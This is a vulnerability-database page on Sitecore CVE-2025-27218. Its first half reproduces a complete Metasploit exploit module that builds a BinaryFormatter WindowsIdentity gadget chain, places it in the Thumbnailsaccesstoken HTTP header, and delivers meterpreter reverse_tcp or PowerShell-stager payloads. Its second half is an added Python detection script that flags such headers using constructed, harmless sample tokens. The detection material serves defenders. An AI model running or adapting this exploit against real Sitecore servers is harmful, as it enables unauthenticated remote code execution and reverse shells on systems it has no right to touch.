Sitecore CVE-2025-27218 BinaryFormatter Deserialization Exploit

Published: 28 Mar 2025 18:50:06
Reported by: Dylan Pindur, machang-r7
Type: metasploit
Source: www.rapid7.com

Exploits the Sitecore CVE-2025-27218 .NET deserialization vulnerability by placing a malicious Base64-encoded BinaryFormatter payload in an HTTP request header.

Code
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote

  Rank = ExcellentRanking

  include Msf::Util::DotNetDeserialization
  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::CmdStager
  include Msf::Exploit::Powershell
  prepend Msf::Exploit::Remote::AutoCheck

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Sitecore CVE-2025-27218 BinaryFormatter Deserialization Exploit',
        'Description' => %q{
          This module exploits a .NET deserialization vulnerability in Sitecore Experience Manager (XM) and Experience
          Platform (XP) 10.4 by injecting a malicious Base64-encoded BinaryFormatter payload into an HTTP header.
        },
        'License' => MSF_LICENSE,
        'Author' => [
          'Dylan Pindur', # Discovery
          'machang-r7'    # Module Creator
        ],
        'References' => [
          ['CVE', '2025-27218'],
          ['EDB', '52344'],
          ['URL', 'https://support.sitecore.com/kb?id=kb_article_view&sysparm_article=KB1003535'],
          ['URL', 'https://attackerkb.com/topics/Dyo4zUm2tv/cve-2025-27218']
        ],
        'DisclosureDate' => '2025-01-06',
        'DefaultTarget' => 0,
        'Platform' => 'win',
        'Targets' => [
          [
            'Windows Command',
            {
              'Arch' => ARCH_CMD,
              'Type' => :windows_command
              # tested with cmd/windows/http/x64/meterpreter/reverse_tcp
            }
          ],
          [
            'PowerShell Stager',
            {
              'Arch' => [ARCH_X86, ARCH_X64],
              'Type' => :psh_stager
              # tested with windows/x64/meterpreter/reverse_tcp
            }
          ]
        ],
        'DefaultOptions' => {
          'RPORT' => 443,
          'SSL' => true
        },
        'Notes' => {
          'Stability' => [CRASH_SAFE],
          'Reliability' => [REPEATABLE_SESSION],
          'SideEffects' => [IOC_IN_LOGS]
        }
      )
    )
    register_options([
      OptString.new('TARGETURI', [true, 'Path to the vulnerable endpoint', '/'])
    ])
  end

  def check
    # Fingerprint only: an unauthenticated GET to TARGETURI whose <title> is the stock
    # Sitecore welcome page. This confirms the product, not that the version is vulnerable.
    res = send_request_cgi({
      'uri' => normalize_uri(target_uri.path),
      'method' => 'GET'
    })

    if res&.code == 200 && res&.get_html_document&.at('//title')&.text&.strip == 'Welcome to Sitecore'
      CheckCode::Detected('The target is running Sitecore.')
    else
      CheckCode::Safe('The target does not appear to be running Sitecore.')
    end
  end

  def exploit
    case target['Type']
    when :windows_command
      execute_command(payload.encoded)
    when :psh_stager
      execute_command(cmd_psh_payload(payload.encoded, payload.arch.first, remove_comspec: true))
    end
  end

  def execute_command(cmd, _opts = {})
    # Serialize a WindowsIdentity gadget chain with BinaryFormatter and Base64-encode it,
    # the encoding the vulnerable header handler expects.
    sploit = Rex::Text.encode_base64(::Msf::Util::DotNetDeserialization.generate(
      cmd,
      gadget_chain: :WindowsIdentity,
      formatter: :BinaryFormatter
    ))

    # Build HTTP request with malicious header
    res = send_request_cgi({
      'uri' => normalize_uri(target_uri.path),
      'method' => 'GET',
      'headers' => {
        'Thumbnailsaccesstoken' => sploit
      }
    })

    if res && res.code == 200
      print_good('Server responded with 200, this probably means it worked.')
    else
      print_error("Server didn't respond with 200. Try setting the target URL to a valid page.")
    end
  end
end
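The module's notes flag IOC_IN_LOGS: every attempt sends a Thumbnailsaccesstoken header whose value is a Base64-encoded BinaryFormatter stream, and a BinaryFormatter stream begins with a fixed SerializationHeaderRecord (record type 0x00, RootId, HeaderId, MajorVersion 1, MinorVersion 0). The following detection script is an added example, not part of the Metasploit module or of Vulners; it assumes you have raw request captures that include headers (for instance from a reverse proxy or WAF, since default IIS W3C logging does not record custom request headers). The request samples and the token inside them are constructed for the example; the token carries only the generic serialization header plus filler, not a gadget chain.

```python
import base64
import binascii
from dataclasses import dataclass

# Header name used by the exploit; compared case-insensitively because
# HTTP header names are case-insensitive.
SUSPECT_HEADER = "thumbnailsaccesstoken"


@dataclass
class Finding:
    request_line: str
    severity: str
    reason: str


def decode_b64(token: str):
    """Strict Base64 decode; returns None when the value is not valid Base64."""
    try:
        return base64.b64decode(token, validate=True)
    except (binascii.Error, ValueError):
        return None


def looks_like_binaryformatter(blob: bytes) -> bool:
    """True if blob starts with a BinaryFormatter SerializationHeaderRecord:
    RecordTypeEnum 0x00, RootId int32, HeaderId int32, MajorVersion int32 == 1,
    MinorVersion int32 == 0 (17 bytes). RootId/HeaderId are not checked so the
    test survives writers that pick different ids."""
    if len(blob) < 17 or blob[0] != 0x00:
        return False
    major = int.from_bytes(blob[9:13], "little", signed=True)
    minor = int.from_bytes(blob[13:17], "little", signed=True)
    return major == 1 and minor == 0


def parse_headers(raw: str):
    """Split a raw HTTP request into its request line and a lowercase header dict."""
    lines = raw.strip().splitlines()
    request_line = lines[0]
    headers = {}
    for line in lines[1:]:
        if ":" not in line:
            continue
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return request_line, headers


def scan_request(raw: str):
    """Return a Finding for one request, or None if the header is absent."""
    request_line, headers = parse_headers(raw)
    token = headers.get(SUSPECT_HEADER)
    if token is None:
        return None
    blob = decode_b64(token)
    if blob is not None and looks_like_binaryformatter(blob):
        return Finding(request_line, "high",
                       f"{SUSPECT_HEADER} carries a BinaryFormatter stream ({len(blob)} bytes)")
    return Finding(request_line, "medium",
                   f"{SUSPECT_HEADER} present but value is not a BinaryFormatter stream")


def scan_requests(capture: str):
    """Scan a capture of blank-line-separated raw requests; returns all findings in order."""
    blocks = [b for b in capture.strip().split("\n\n") if b.strip()]
    return [f for f in (scan_request(b) for b in blocks) if f is not None]


# Constructed sample token: the 17-byte serialization header followed by filler bytes.
_BF_HEADER = (bytes([0x00])
              + (1).to_bytes(4, "little")
              + (-1).to_bytes(4, "little", signed=True)
              + (1).to_bytes(4, "little")
              + (0).to_bytes(4, "little"))
CONSTRUCTED_TOKEN = base64.b64encode(_BF_HEADER + b"\x0c\x02\x00\x00\x00CONSTRUCTED-FILLER").decode()
_BENIGN_TOKEN = base64.b64encode(b"not a serialized object").decode()

# Constructed capture: one clean request, one exploit-shaped request, one odd but non-BinaryFormatter value.
SAMPLE_REQUESTS = f"""GET /sitecore/ HTTP/1.1
Host: cms.example.internal
User-Agent: Mozilla/5.0

GET / HTTP/1.1
Host: cms.example.internal
Thumbnailsaccesstoken: {CONSTRUCTED_TOKEN}

GET / HTTP/1.1
Host: cms.example.internal
Thumbnailsaccesstoken: {_BENIGN_TOKEN}
"""

if __name__ == "__main__":
    for finding in scan_requests(SAMPLE_REQUESTS):
        print(f"[{finding.severity}] {finding.request_line}: {finding.reason}")
```

Run as-is it reports one high-severity hit (header value decodes to a BinaryFormatter stream) and one medium hit (header present with a non-BinaryFormatter value). The high-severity rule is the one worth alerting on; the medium rule is there because an unexpected value in a header that the application deserializes is itself worth a look, and because an attacker could wrap the payload differently than this module does. Pair the alert with the vendor fix in KB1003535 rather than relying on detection alone.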


Vulners AI Score: 7.3 (High risk)
CVSS 3.1: 5.3
EPSS: 0.6356